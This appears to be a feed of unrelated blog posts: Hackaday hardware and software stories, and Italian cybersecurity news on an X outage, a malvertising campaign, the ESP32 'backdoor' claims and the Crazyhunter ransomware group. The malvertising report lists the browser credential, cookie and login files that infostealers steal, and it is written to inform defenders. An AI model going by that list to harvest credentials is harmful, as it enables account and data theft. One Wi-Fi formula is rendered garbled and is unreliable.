Il Wi-Fi non è solo software e reti, ma onde elettromagnetiche che devono superare distanze e ostacoli per connettere i dispositivi. Le sue frequenze operano nelle bande ISM (2,4 e 5 GHz) e U-NII (6 GHz), e la loro propagazione è governata da precise leggi fisiche. La frequenza detta tutto: a 2,4 GHz la lunghezza d’onda è 12,5 cm, ideale per attraversare muri; a 6 GHz scende a 5 cm, perfetta per velocità ma fragile contro ostacoli.

La potenza ricevuta crolla con la distanza secondo la legge dell’inverso del quadrato:

Pr​=(4πR)2Pt​​

Aggiungete assorbimento (10-15 dB per un muro in cemento) e riflessioni, e capite perché il segnale si spegne a 50 metri indoors. Ma ci sono trucchi: il beamforming focalizza le onde come un faro, e l’OFDM suddivide i dati in sottocanali per schivare interferenze. Il Wi-Fi 7 spinge oltre, con 4096-QAM che infila più bit in ogni simbolo, aumentando il throughput del 20% rispetto a Wi-Fi 6.

Wi-Fi 7: il Futuro è Ora

Nel 2025, Wi-Fi 7 è il nuovo standard di riferimento, portando la connettività wireless a livelli mai visti prima:

• Canali a 320 MHz: Il doppio di Wi-Fi 6, per un’autostrada di dati.
• MLO: Multi-banda in tempo reale, latenza sotto 1 ms.
• 6 GHz: Spettro pulito, ma serve più densità di AP per coprire.

Risultato? Puoi streammare 8K, gestire un’armata di dispositivi IoT e lavorare in remoto senza lag. Ma c’è un prezzo: più AP significa più costi, e la sicurezza deve stare al passo con minacce sempre più sofisticate.

Sfide di Sicurezza e Prospettive

Il Wi-Fi è potente, ma anche vulnerabile se non protetto adeguatamente. WPA3 rappresenta un passo avanti, ma le minacce persistono:

• Attacchi di deauthentication flood, che disconnettono forzatamente i dispositivi.
• Exploitation di vulnerabilità nei chipset, come dimostrato dagli attacchi FragAttacks (2021).
• IoT in crescita esponenziale – Ogni dispositivo connesso è un potenziale punto debole nella rete.

MLO aiuta a distribuire il traffico e ridurre i rischi, ma senza crittografia e segmentazione adeguata, un Access Point compromesso può essere un cavallo di Troia. Inoltre, la diffusione della banda 6 GHz porterà a una maggiore densità di dispositivi, rendendo necessaria l’adozione di algoritmi AI per la gestione dinamica delle interferenze e l’ottimizzazione dei canali in tempo reale.

Conclusione: un Equilibrio Precario

Il protocollo IEEE 802.11 è un capolavoro di ingegneria, che ha reso il Wi-Fi sinonimo di velocità, flessibilità e ubiquità. Con Wi-Fi 7, il futuro della connettività entra in una nuova era, ma non senza compromessi:

• Sicurezza e minacce informatiche restano una sfida costante.
• Interferenze e gestione dello spettro richiederanno soluzioni intelligenti.
• Costi e scalabilità potrebbero rallentare l’adozione in certi ambienti.

Per chi si occupa di cybersecurity e gestione delle reti, il messaggio è chiaro: progettare con lungimiranza, proteggere ogni strato e prepararsi a un mondo sempre più wireless – e sempre più esposto ai rischi.

Seguici sulla nostra Rubrica WiFi per rimanere sempre aggiornato!

Riferimenti:

[1] IEEE (2024). Wi-Fi 7 Technical Overview.

[2] Higher Order Feature Extraction and Selection for Robust Human Gesture Recognition using CSI of COTS Wi-Fi Devices mdpi.com/1424-8220/19/13/2959

L'articolo Dentro le Reti Wireless IEEE 802.11: Architettura e Segnale Wi-Fi proviene da il blog della sicurezza informatica.

There’s something magical about the clunk of a heavy 1950s portable radio – the solid thunk of Bakelite, the warm hum of tubes glowing to life. This is exactly why [Ken’s Lab] took on the restoration of a Philco 52-664, a portable AC/DC radio originally sold for $45 in 1953 (a small fortune back then!). Despite its beat-up exterior and faulty guts, [Ken] methodically restored it to working condition. His video details every crackling capacitor and crusty resistor he replaced, and it’s pure catnip for any hacker with a soft spot for analog tech. Does the name Philco ring a bell? Lately, we did cover the restoration of a 1958 Philco Predicta television.

What sets this radio hack apart? To begin with, [Ken] kept the restoration authentic, repurposing original capacitor cans and using era-appropriate materials – right down to boiling out old electrolytics in his wife’s discarded cooking pot. But, he went further. Lacking the space for modern components, [Ken] fabbed up a custom mounting solution from stiff styrofoam, fibreboard, and all-purpose glue. He even re-routed the B-wiring with creative terminal hacks. It’s a masterclass in patience, precision, and resourcefulness.

If this tickles your inner tinkerer, don’t miss out on the full video. It’s like stepping into a time machine.

youtube.com/embed/TimWXHoAfss?…

hackaday.com/2025/03/10/hackin…

Satellite imagery is in the news right now, but not all satellite constellations are the preserve of governments. Satellogic operates a series of CubeSats with Earth imaging payloads, and best of all, they maintain an open dataset. [Mark Litwintschik] takes us through using it.

Starting with a script to recover the locations of the satellites, he moves on to the data itself. It’s in a huge S3 bucket, for which parsing the metadata becomes a big data question rather than one of simple retrieval. After parsing he loads the resulting data into a database, from which he can then perform queries more easily. He uses Qatar as his example, and shows us the resulting imagery.

The dataset isn’t comprehensive, it’s obvious that the areas surveyed have been done at the behest of customers. But who knows, your part of the world might be one of the areas in the dataset, and now you have all the tools you need to explore. It certainly beats low-res weather satellite imagery.

hackaday.com/2025/03/10/satell…

[Tech Minds] built one of those cheap automatic antenna tuners you see everywhere — this one scaled up to 350 watt capability. The kit is mostly built, but you do have to add the connectors and a few other stray bits. You can see how he did it in the video below.

What was very interesting, however, was that it wasn’t able to do a very good job tuning a wire antenna across the ham bands, and he asks for your help on what he should try to make things better.

It did seem to work in some cases, and changing the length of the wire changed the results, so we would guess some of it might be a resonance on the antenna wire. However, you would guess it could do a little better. It is well known that if a wire is one of a number of certain lengths, it will have extremely high impedence in multiple ham bands and be challenging to tune. So random wires need to not be exactly random. You have to avoid those lengths.

In addition, we were surprised there wasn’t more RF protection on the power lines. We would probably have suggested winding some coax to act as a shield choke, RF beads, and even extra bypass capacitors.

Another possible problem is that the diodes in these units are often not the best. [PU1OWL] talks about that in another video and bypasses some of the power lines against RF, too.

If you have any advice, we are sure he’d love to hear it. As [PU1OWL] points out, a tuner like this can’t be any better than its SWR measurement mechanism. Of course, all of these tuners take a few watts to light them up. You can, however, tune with virtually no power with a VNA.

youtube.com/embed/L8VH30MwNEU?…

hackaday.com/2025/03/10/whats-…

Modern e-readers such as the Amazon Kindle are incredible pieces of engineering, but that doesn’t mean there’s no room for improvement. A device custom-built to your own specifications is always going to provide a more satisfying experience than something purchased off the shelf. That’s why [fel88] put together this custom e-reader which offers a number of unique features, such as a solar panel on the back and button-free operation.

One issue with modern e-readers, at least as [fel88] sees it, is that they have a lot of unnecessary features. This project removes most of them, stripping down the device to its core functionality: a straightforward menu for selecting books and gesture-sensing for navigating the menu as well as changing the pages. The only physical input on the device is a small reed switch to turn the device on. A 3D printed case holds the e-ink display and encloses the inner workings, driven by an Arduino Mega 2560 and powered by three lithium-ion capacitors (LICs) and a small solar panel.

By dropping all of the unnecessary features, the device doesn’t need to waste energy with things like WiFi or Bluetooth and can get around 880 pages on a single charge, not counting any extra energy coming in through the solar panel while it’s operating. The LICs will also theoretically improve its life cycle as well. If you’re still stuck with a paperweight when you formerly had a working e-reader, though, there are plenty of ways to bring old devices back to life as well.

hackaday.com/2025/03/10/solar-…

There have been several attempts to make an unencumbered version of Windows. ReactOS is perhaps the best-known, although you could argue Wine and its progeny, while not operating systems in the strictest sense of the word, might be the most successful. Joining the fray is Free95, a GPL-3.0 system that, currently, can run simple Windows programs. The developer promises to push to even higher compatibility.

As you might expect, the GitHub site is calling for contributors. There will be a lot to do. The src subdirectory has a number of files, but when you consider the sheer volume of stuff crammed into Windows, it is just a minimal start.

As for the “Does it run Doom?” test, we are pretty sure the answer is no, not yet. While we applaud the effort, we do think it is a long road to get from where the project is to where even ReactOS is, much less Windows itself. Besides, Windows is a rapidly moving target.

As virtualization becomes easier and faster, the need for these programs diminishes. You can easily run a Windows OS inside your host operating system. If it outperforms the original on period hardware, maybe that’s good enough. On the other hand, if you are trying to run old hardware, maybe something like this will let you get a few more years out of it, one day.

We’ve looked at ReactOS before. If you are just looking to reduce bloat, there are other ways to go.

hackaday.com/2025/03/10/freein…

X, la piattaforma di social media precedentemente nota come Twitter, nella giornata di oggi è rimasta offline per diverso tempo. Secondo Downdetector.com, X ha riscontrato per la prima volta problemi diffusi intorno alle 5:40 ET di lunedì.

Alcuni utenti hanno affermato di non essere riusciti a caricare i post di X o di aver ricevuto messaggi di errore come “Qualcosa è andato storto. Prova a ricaricare”.

X ha poi ripreso il servizio nella tarda mattinata di oggi, ma è sembrato che abbia subito nuovamente delle interruzioni intorno alle 10:00 ET, raggiungendo il picco con 40.000 segnalazioni di problemi, e alle 13:00 ET e poi alle 19 ora locale italiana.

Le interruzioni sono state segnalate a livello globale.

Le rivendicazione di Dark Storm Team

Nel mentre il gruppo Dark Storm Team ha rivendicato la responsabilità di un attacco DDoS su X. Gli hacker si sono formati come collettivo filo-palestinese nel 2023 e avrebbero preso di mira i siti web governativi dei paesi della NATO, di Israele e delle nazioni che sostengono Israele.

Come sanno i nostri lettori, un attacco DDoS (distributed denial-of-service) include volumi di traffico sospetti o picchi di traffico che causano il rallentamento o l’indisponibilità di un sito Web o di un servizio. Inondare un bersaglio con connessioni malformate può renderlo inaccessibile agli utenti legittimi.

Nel post su Telegram acquisito da Red Hot Cyber, il collettivo rivendica la responsabilità dell’attacco DDoS su X di oggi. Dark Storm Team ha scritto di essere riuscito a “mettere offline Twitter” e ha condiviso uno screenshot di una pagina sullo stato della connettività in tempo reale che mostrava tentativi di connessione falliti da più sedi in tutto il mondo.

Il gruppo di hacker Dark Storm Team (DST) sarebbe stato creato nel settembre 2023, poche settimane prima dell’attacco terroristico di Hamas del 7 ottobre contro Israele.

Si dice che il gruppo sia filo-palestinese e abbia possibili collegamenti con la Russia.

Le dichiarazioni di Elon Musk

“C’è stato (c’è ancora) un massiccio attacco informatico contro X”, ha scritto Musk lunedì pomeriggio. “Siamo attaccati ogni giorno, ma questo è stato fatto con molte risorse. È coinvolto un gruppo numeroso e coordinato e/o un paese. Tracciare…”

Musk è anche l’amministratore delegato di Tesla e SpaceX, oltre a guidare il DOGE (Dipartimento per l’efficienza governativa) del presidente Donald Trump.

L'articolo X va Offline per un Attacco DDoS di Dark Storm. Elon Musk: “Gruppo Mumeroso e Coordinato” proviene da il blog della sicurezza informatica.

Microsoft ha rivelato che negli ultimi mesi quasi 1 milione di dispositivi Windows sono stati colpiti da una sofisticata campagna di malvertising. Credenziali, criptovalute e informazioni riservate sono state rubate dai computer degli utenti infetti.

Secondo i ricercatori, la campagna è iniziata a dicembre 2024, quando degli aggressori sconosciuti hanno iniziato a distribuire link attraverso i quali venivano caricati annunci pubblicitari. Microsoft sostiene che i siti che ospitavano gli annunci pubblicitari erano piattaforme di streaming pirata che ospitavano contenuti illegali. Il rapporto dell’azienda cita due di questi domini: movies7[.]net e 0123movie[.]art.

“I siti di streaming installavano redirector dannosi per generare entrate dalle piattaforme di pagamento per visualizzazioni o clic”, scrivono gli esperti.
Schema dell’attacco
I link dannosi incorporati tramite iframe portavano le vittime attraverso una catena di reindirizzamenti, una serie di siti intermedi (come un sito di supporto tecnico truffaldino) e infine conducevano a repository GitHub che ospitavano una serie di file dannosi.

Il malware è stato distribuito in più fasi. Pertanto, nelle fasi iniziali, venivano raccolte informazioni sul dispositivo dell’utente, presumibilmente per configurare le fasi successive dell’attacco. Nelle fasi successive, le applicazioni di rilevamento del malware sono state disattivate ed è stata stabilita una connessione con i server di controllo, dopodiché il malware NetSupport è stato installato sul sistema.

“A seconda del payload della seconda fase, uno o più file eseguibili e talvolta uno script PowerShell codificato venivano recapitati al dispositivo infetto”, hanno scritto i ricercatori. “Questi file hanno innescato una catena di eventi che includeva l’esecuzione di comandi, la consegna di payload, l’elusione delle difese, il raggiungimento della persistenza, la comunicazione con i server di comando e controllo e il furto di dati”.

Per ospitare il payload è stato utilizzato principalmente GitHub, ma sono stati utilizzati anche Discord e Dropbox. Gli esperti ritengono che la campagna sia stata opportunistica, nel senso che gli aggressori hanno preso di mira tutti senza prendere di mira persone, organizzazioni o settori specifici.

Il malware che penetrava nei sistemi delle vittime (solitamente l’infostealer Lumma e Doenerium) rubava i seguenti dati dai browser, dove potevano essere archiviati cookie di accesso, password, cronologie e altre informazioni sensibili.

• \AppData\Roaming\Mozilla\Firefox\Profiles\.default-release\cookies.sqlite;
• \AppData\Roaming\Mozilla\Firefox\Profiles\.default-release\formhistory.sqlite;
• \AppData\Roaming\Mozilla\Firefox\Profiles\.default-release\key4.db;
• \AppData\Roaming\Mozilla\Firefox\Profiles\.default-release\logins.json;
• \AppData\Local\Google\Chrome\Dati utente\Default\Dati Web;
• \AppData\Local\Google\Chrome\Dati utente\Default\Dati di accesso;
• \AppData\Local\Microsoft\Edge\Dati utente\Default\Dati di accesso.

Gli aggressori erano interessati anche ai file archiviati nel servizio cloud Microsoft OneDrive e il malware verificava la presenza di portafogli di criptovaluta (Ledger Live, Trezor Suite, KeepKey, BCVault, OneKey e BitBox) sul computer della vittima.

Secondo Microsoft, i payload della prima fase erano firmati digitalmente e l’azienda ha ora identificato e revocato 12 diversi certificati utilizzati in questi attacchi.

L'articolo Microsoft svela un attacco shock: 1 milione di PC infettati da malware nascosto negli ADS proviene da il blog della sicurezza informatica.

When it comes to what birds have and what humans don’t, your mind might first land on the ability to fly. However, birds are also pretty good at navigating from the air… assuming, that is, they know where they’re trying to go in the first place.

In recent decades, conservationists have been trying to reintroduce the northern bald ibis to central Europe. There’s just one problem—when the birds first died out on the continent, so did their handed-down knowledge of their traditional migration route. Somehow, the new generation had to be taught where to go.

Flightpaths

The northern bald ibis was once widely found all over Europe, but disappeared several centuries ago. It had the most success clinging on in Morocco, which has been a source of birds for reintroduction efforts. Credit: Len Worthington, CC BY-SA 2.0
The population of the northern bald ibis used to be spread farther and wider than it is today. Fossil records indicate the bird once lived in great numbers across northern Africa, the Middle East, and southern and central Europe. Sadly, it vanished from Europe sometime in the 17th century, though it persisted elsewhere, most notably in Morocco. A wild population hung on in Turkey, though faced a rapid decline from the 1970s onwards, with birds failing to return from their winter migrations. In 1992, a handful of remaining birds were kept caged for part of the year to prevent these annual losses. Meanwhile, in 2002, it was revealed that a handful of birds were clinging on with isolated nests found in Syria. Numbers remain limited in the low four-figure range, with the northern bald ibis definitively listed as endangered.

ED NOTE: Great pictures here but it’s not 100% clear if we can use them.waldrapp.eu/pictures/

With the bird’s status in danger, multiple reintroduction efforts have been pursued around the world. In particular, European efforts had boosted a conserved population up to 300 individuals by the early 2000s. However, keeping the birds alive proved challenging. Being unfamiliar with the continent, the birds would tend to fly off in random directions when their instinct kicked in to migrate for winter. Without knowing where they were going, few birds would make it to a suitably warm climate for the colder months, and many failed to return home in the summer.
The birds are kept in aviaries at times to ensure they are fit for migration and that they don’t head off in a random direction of their own accord. Credit: Baekemm, CC BY-SA 4.0
In 2002, an effort to solve this began in earnest. It hoped to not only return the birds to the wild, but to let them freely roam and migrate as they once did with abandon. The hope was to breed birds in captivity, and then train them on their traditional migration route, such that they might then pass the knowledge on to their descendants.

Of course, you can’t simply sit a northern bald ibis down with a map and show it how to get from northern Austria down to Tuscany and back. Nor can you train it on a flight simulator or give it a GPS. Instead, the conservationists figured they’d teach the birds the old fashioned way. They’d fly the route with a microlite aircraft, with the birds trained to follow along behind. Once they got the idea, the microlite would guide them on the longer migration route, and the hope was that they’d learn to repeat the journey themselves for the future.

The benefit of using ultralight air craft was simple. It allowed the birds to see their keepers and follow a familiar human in flight. In contrast, typical general aviation aircraft or larger planes wouldn’t be so familiar to the birds, and they wouldn’t be so eager to follow.

In 2003, the first migration attempt took place. The initial attempt faced challenges, with inclement weather forcing the birds to be transported much of the way by road. However, the following year found great success. The birds were guided south during the autumn, and returned the following spring. The project continued, with repeat successes over the years. Reports from 2010 were particularly buoyant. Across August and September that autumn, the journey saw 14 birds following the microlites for an average distance of 174 km a day, winding up in Tuscany in time for the winter.

youtube.com/embed/3kE83VIZZO0?…

The project continues in earnest to this day. “We have to teach them the migration route and that’s what we do using microlight planes,” project director Johannes Fritz told AP. Leading the Waldrappteam, he’s been working for decades to train the birds on what used to come naturally. “Human foster parents raise the chicks so they are imprinted on human foster parents, and then we train them to follow the foster parents which sit on the back seat of the microlight—and it works.” The training is taking, with the team recording multiple birds independently deciding to fly the correct migration route over the years.

The hope is that the flock will grow larger and eventually become self-sustaining. Ideally, the older birds that know the route will teach younger generations, just as they learned themselves from the microlite pilots in their youth. It’s a grand tradition, passed down from pilot to bird to bird, perhaps not quite as nature intended!

Featured image: “Migration 2023 Laura Pehnke” Copyright: Waldrappteam Conservation & Research

hackaday.com/2025/03/10/conser…

Recently there was a panicked scrambling after the announcement by [Tarlogic] of a ‘backdoor’ found in Espressif’s popular ESP32 MCUs. Specifically a backdoor on the Bluetooth side that would give a lot of control over the system to any attacker. As [Xeno Kovah] explains, much about these claims is exaggerated, and calling it a ‘backdoor’ is far beyond the scope of what was actually discovered.

To summarize the original findings, the researchers found a number of vendor-specific commands (VSCs) in the (publicly available) ESP32 ROM that can be sent via the host-controller interface (HCI) between the software and the Bluetooth PHY. They found that these VSCs could do things like writing and reading the firmware in the PHY, as well as send low-level packets.

The thing about VSCs is of course that these are a standard feature with Bluetooth controllers, with each manufacturer implementing a range of these for use with their own software SDK. These VSCs allow for updating firmware, report temperatures and features like debugging, and are generally documented (except for Broadcom).

Effectively, [Xeno] makes the point that VSCs are a standard feature in Bluetooth controllers, which – like most features – can also be abused. [Tarlogic] has since updated their article as well to distance themselves from the ‘backdoor’ term and instead want to call these VSCs a ‘hidden feature’. That said, if these VSCs in ESP32 chips are a security risk, then as [Xeno] duly notes, millions of BT controllers from Texas Instruments, Broadcom and others with similar VSCs would similarly be a security risk.

hackaday.com/2025/03/10/the-es…

Despite a general lack of real-world experience, many teenagers are overly confident in their opinions, often to the point of brashness and arrogance. In the late 90s and early 00s I was no different, firmly entrenched in a clichéd belief that Apple computers weren’t worth the silicon they were etched onto—even though I’d never actually used one. Eventually, thanks to a very good friend in college, a bit of Linux knowledge, and Apple’s switch to Intel processors, I finally abandoned this one irrational belief. Now, I maintain an array of Apple laptops for my own personal use that are not only surprisingly repairable and hacker-friendly but also serve as excellent, inexpensive Linux machines.

Of course, I will have ruffled a few feathers suggesting Apple laptops are repairable and inexpensive. This is certainly not true of their phones or their newer computers, but there was a time before 2016 when Apple built some impressively high quality, robust laptops that use standard parts, have removable batteries, and, thanks to Apple dropping support for these older machines in their latest operating systems, can also be found for sale for next to nothing. In a way that’s similar to buying a luxury car that’s only a few years old and letting someone else eat the bulk of the depreciation, a high quality laptop from this era is only one Linux install away from being a usable and relatively powerful machine at an excellent bargain.

The History Lesson

To be fair to my teenage self though, Apple used to use less-mainstream PowerPC processors which meant there was very little software cross-compatibility with x86 PCs. It was also an era before broadband meant that most people could move their work into cloud and the browser, allowing them to be more agnostic about their operating system. Using an Apple when I was a teenager was therefore a much different experience than it is today. My first Apple was from this PowerPC era though; my ThinkPad T43 broke mid-way through college and a friend of mine gave me an old PowerBook G4 that had stopped working for her. Rather than have no computer at all, I swallowed my pride and was able to get the laptop working well enough to finish college with it. Part of the reason this repair was even possible was thanks to a major hacker-friendly aspect of Apple computers: they run Unix. (Note for commenters: technically Apple’s OS is Unix-like but they have carried a UNIX certification since 2007.)

I had used Unix somewhat in Solaris-based labs in college but, as I mentioned in a piece about installing Gentoo on one of my MacBooks, I was also getting pretty deep into the Linux world at the time as well. Linux was also designed to be Unix-like, so most of the basic commands and tools available for it have nearly one-to-one analogs in Unix. The PowerBook’s main problem, along with a battery that needed a warranty replacement, was a corrupted filesystem and disk drive that I was able to repair using my new Linux knowledge. This realization marked a major turning point for me which helped tear down most of my biases against Apple computers.
MacBooks through the ages
Over the next few years or so I grew quite fond of the PowerBook, partially because I liked its 12″, netbook-like form factor and also because the operating system never seemed to crash. As a Linux user, my system crashes were mostly self-inflicted, but they did happen. As a former Windows user as well, the fact that it wouldn’t randomly bluescreen itself through no fault of my own was quite a revelation. Apple was a few years into their Intel years at this point as well, and seeing how easily these computers did things my PowerBook could never do, including running Windows, I saved up enough money to buy my first MacBook Pro, a mid-2009 model which I still use to this day. Since then I’ve acquired four other Apple laptops, most of which run Linux or a patched version of macOS that lets older, unsupported machines run modern versions of Apple’s operating system.

So if you’ve slogged through my coming-of-age story and are still curious about picking up an old Mac for whatever reason—a friend or family member has one gathering dust, you’re tired of looking at the bland styling of older ThinkPads while simultaneously growing frustrated with the declining quality of their newer ones, or just want to go against the grain a bit and do something different—I’ll try and help by sharing some tips and guidelines I’ve picked up through the years.

What to Avoid

Starting with broad categories of older Apple laptops to avoid, the first major red flag are any with the butterfly keyboard that Apple put on various laptops from 2015 to 2019 which were so bad that a number of lawsuits were filed against them. Apple eventually relented and instituted a replacement program for them, but it’s since expired and can cost hundreds of dollars to fix otherwise. The second red flag are models with the T2 security chips. It’s not a complete dealbreaker but does add a lot of hassle if the end goal is a working Linux machine.

Additionally, pay close attention to any laptops with discrete graphics cards. Some older MacBooks have Nvidia graphics, which is almost always going to provide a below-average experience for a Linux user especially for Apple laptops of this vintage. Others have AMD graphics which do have better Linux support, but there were severe problems with the 15″ and 17″ Mac around the 2011 models. Discrete graphics is not something to avoid completely like laptops with butterfly keyboards, but it’s worth investigating the specific model year for problems if a graphics card is included. A final note is to be aware of “Staingate” which is a problem which impacted some Retina displays between 2012 and 2015. This of course is not an exhaustive list, but covers the major difficult-to-solve problems for this era of Apple laptop.

What to Look For

As for what specific computers are the best from this era for a bit of refurbishment and use, in my opinion the best mix of performance, hackability, and Linux-ability will be from the 2009-2012 Unibody era. These machines come in all sizes and are surprisingly upgradable, with standard SODIMM slots for RAM, 2.5″ laptop drives, an optical drive (which can be changed out for a second hard drive), easily replaceable batteries if you can unscrew the back cover, and plenty of ports. Some older models from this era have Core 2 Duo processors and should be avoided if you have the choice, but there are plenty of others from this era with much more powerful Core i5 or Core i7 processors.

After 2012, though, Apple started making some less-desirable changes for those looking to maintain their computers long-term, like switching to a proprietary M.2-like port for their storage and adding in soldered or otherwise non-upgradable RAM, but these machines can still be worthwhile as many had Core i7 processors and at least 8 GB of RAM and can still run Linux and even modern macOS versions quite capably. The batteries can still be replaced without too much hassle as well.
Inside the 2012 MacBook Pro. Visible here are the 2.5″ SSD, removable battery, standard SODIMM RAM slots, optical drive, and cooling fan.
Of course, a major problem with these computers is that they all have processors that have the Intel Management Engine coprocessor installed, so they’re not the most privacy-oriented machines in existence even if Linux is the chosen operating system. It’s worth noting, though, that some MacBooks from before the unibody era can run the open-source bootloader Libreboot but the tradeoff, as with any system capable of running Libreboot, is that they’re a bit limited in performance even compared to the computers from just a few years later.

Out of the five laptops I own, four are from the pre-butterfly era including my two favorites. Topping the list is a mid-2012 13″ MacBook Pro with Intel graphics that’s a beast of a Debian machine thanks to upgrades to a solid state drive and to 16 GB of RAM. It also has one of the best-feeling laptop keyboards I’ve ever used to write with, and is also the computer I used to experiment with Gentoo.

Second place goes to a 2015 11″ MacBook Air which is a netbook-style Apple that I like for its exceptional portability even though it’s not as upgradable as I might otherwise like. It will have 4 GB of RAM forever, but this is not much of a problem for Debian. I also still have my 2009 MacBook Pro as well, which runs macOS Sonoma thanks to OpenCore Legacy Patcher. This computer’s major weakness is that it has an Nvidia graphics card so it isn’t as good of a Linux machine as the others, and occasionally locks up when running Debian for this reason. But it also has been upgraded with an SSD and 8 GB of RAM so Sonoma still runs pretty well on it despite its age. Sequoia, on the other hand, dropped support for dual-core machines so I’m not sure what I will do with it after Sonoma is no longer supported.
A 13″ MacBook Air from 2013. Not quite as upgradable as the 2012 MacBook Pro but still has a removable battery and a heat sink which can be re-pasted much more easily.
My newest Apple laptop is an M1 MacBook Air, which I was excited about when it launched because I’m a huge fan of ARM-based personal computers for more reasons than one. Although the M1 does have essentially no user-repairability unless you want to go to extremes, I have some hope that this will last me as long as my MacBook Pros have thanks to a complete lack of moving parts and also because of Asahi Linux, a version of Fedora which is built for Apple silicon. Whenever Apple stops providing security patches for this machine, I plan to switch it over to this specialized Linux distribution.

Why Bother?

But why spend all this effort keeping these old machines running at all? If repairability is a major concern, laptops from companies like System76 or Framework are arguably a much better option. Not to mention that, at least according to the best Internet commenters out there, Apple computers aren’t supposed to be fixable, repairable, or upgradable at all. They’re supposed to slowly die as upgrades force them to be less useful.

While this is certainly true for their phones and their more modern machines to some extent, part of the reason I keep these older machines running is to go against the grain and do something different, like a classic car enthusiast who picks a 70s era Volkswagen to drive to and from the office every day instead of a modern Lexus. It’s also because at times I still feel a bit like that teenager I was. While I might be a little wiser now from some life experiences, I believe some amount of teenage rebellion can be put to use stubbornly refusing to buy the latest products year after year from a trillion-dollar company which has become synonymous with planned obsolescence. Take that, Apple!

hackaday.com/2025/03/10/inexpe…

Nelle ricognizioni nel mondo dell’underground e dei gruppi criminali svolte dal laboratorio di intelligence delle minacce DarkLab di Red Hot Cyber, ci siamo imbattuti all’interno di un Data Leak Site di una cyber gang mai monitorata prima: Crazyhunter.

Con un’identità distinta e un manifesto che lo pone in contrasto con altri attori della scena cybercriminale, Crazyhunter si presenta come un’operazione sofisticata che punta sulla velocità di attacco, la distruzione dei dati e un sistema di branding criminale altamente strutturato.

Dalle informazioni raccolte sul loro Data Leak Site (DLS), disponibile nella rete Tor, il gruppo sembra adottare un approccio metodico e aggressivo, mirato a compromettere la sicurezza aziendale nel minor tempo possibile.

Con un sistema di negoziazione e gestione del riscatto che include strumenti di “dimostrazione” delle loro capacità distruttive, Crazyhunter si distingue per un modello di business che enfatizza la crittografia avanzata e persino l’uso della blockchain per registrare le loro “promesse” di decrittazione.

Struttura del DLS di Crazyhunter

Il portale Tor di Crazyhunter si articola in più sezioni, con un design minimale ma funzionale.

L’homepage Presenta il nome del gruppo e il motto: “There is no absolute safety”. Un’affermazione che riflette la loro filosofia, secondo cui nessun sistema è immune a un attacco ben strutturato.

Victim List

L’elenco delle vittime pubblicate mostra aziende ed enti, prevalentemente in Taiwan, tra cui ospedali e università. Ogni scheda riporta:

• Importo del riscatto richiesto (fino a $1.500.000).
• Stato della trattativa, con alcune voci contrassegnate come Expired (probabilmente significa che i dati verranno rilasciati) e altre con la dicitura Successful cooperation (indicando un pagamento effettuato).
• Timer per la scadenza dell’accordo, suggerendo un meccanismo di pressione psicologica sulle vittime.

About Us Qui il gruppo descrive il proprio modus operandi e i punti di forza del ransomware.

Contact Us Pagina con un form di contatto, utilizzata per le negoziazioni o possibili collaborazioni.

Tecniche e Tattiche di Attacco

Dalle informazioni fornite nel manifesto strategico, Crazyhunter si propone come un’operazione altamente tecnica, con una serie di caratteristiche distintive che lo rendono particolarmente pericoloso:

Approccio ultra-rapido: il “72-hour Vulnerability Response Vacuum”

Crazyhunter sostiene di bucare la sicurezza delle vittime in meno di 72 ore, grazie a:

• Exploit esclusivi, con un tempo di rilevamento superiore del 300% rispetto alle medie stimate dal MITRE.
• Bypass avanzato dei più noti sistemi di protezione degli endpoint, tra cui CrowdStrike, SentinelOne, Microsoft Defender XDR, Symantec EDR, Trend Micro XDR.

Questo indica che il gruppo sfrutta vulnerabilità zero-day o N-day ben mirate, oltre a tattiche di evasion avanzate, che potrebbero includere l’uso di malware polimorfico e tecniche di attacco senza file (fileless attacks).

Il “Three-dimensional Data Annihilation System”

Crazyhunter non si limita a cifrare i dati, ma introduce un concetto di “annientamento” su tre livelli:

• Encryption Layer → Utilizza l’algoritmo XChaCha20-Poly1305, noto per la sua sicurezza e velocità, rendendo impossibile il recupero dei dati senza la chiave corretta.
• Destruction Layer → Impiega una tecnologia di cancellazione approvata dalla CIA, probabilmente riferendosi a standard come DoD 5220.22-M o metodi di sovrascrittura multipla per rendere i dati irrecuperabili.
• Deterrence Layer → Qui emerge un aspetto nuovo nel panorama ransomware: il gruppo afferma di generare prove compromettenti altamente realistiche contro i dirigenti delle aziende attaccate, mediante AI e deepfake, per esercitare una pressione aggiuntiva nelle negoziazioni.

Questo mix di crittografia avanzata, distruzione totale dei dati e minacce reputazionali rende Crazyhunter un attore unico nel suo genere, combinando ransomware tradizionale con metodi di coercizione psicologica.

Criminal Branding e Blockchain

Crazyhunter si distingue anche per un concetto inedito nel mondo del ransomware: il branding criminale. Tra i servizi offerti ci sono:

• Possibilità di ritardare la pubblicazione dei dati pagando il 50% del riscatto in anticipo.
• Una guida alla remediation delle vulnerabilità utilizzate per l’attacco, apparentemente come incentivo al pagamento.
• Un video di prova della cancellazione dei dati una volta pagato il riscatto.

Infine, il manifesto strategico sottolinea che il gruppo non si considera “avido” come REvil o “troppo rumoroso” come LockBit, e dichiara di fare solo tre cose:

1. Dimostrare l’inevitabilità dell’attacco attraverso la matematica.
2. Assicurare l’irreversibilità della minaccia tramite il codice.
3. Registrare ogni promessa mantenuta sulla blockchain.

L’ultimo punto suggerisce che Crazyhunter potrebbe utilizzare una blockchain pubblica o privata per tenere traccia delle operazioni completate, forse per dimostrare alle future vittime che mantengono la parola quando si tratta di fornire i decryptor dopo il pagamento.

Obiettivi e Vittime

L’analisi della victim list sul DLS di Crazyhunter mostra che il gruppo si è concentrato prevalentemente su organizzazioni taiwanesi, con un focus su:

• Università e istituti di ricerca (Asia University, Asia University Hospital).
• Strutture sanitarie (Mackay Hospital, Changhua Christian Medical Foundation).
• Aziende del settore energetico (Huacheng Electric).

L’inclusione di ospedali e istituzioni accademiche suggerisce un target opportunistico, dove la probabilità di pagamento è elevata a causa della sensibilità dei dati coinvolti. Tuttavia, è possibile che il gruppo espanda il proprio raggio d’azione verso aziende di altri settori nei prossimi mesi.

Conclusioni

Crazyhunter non è il solito gruppo ransomware. A differenza di altre operazioni che si concentrano solo sulla cifratura dei file, questo gruppo introduce tattiche di pressione aggiuntive, tra cui:

• Distruzione irreversibile dei dati, oltre alla cifratura.
• Uso di AI per creare prove compromettenti contro i dirigenti.
• Registrazione delle operazioni sulla blockchain per costruire “fiducia” nel mercato criminale.

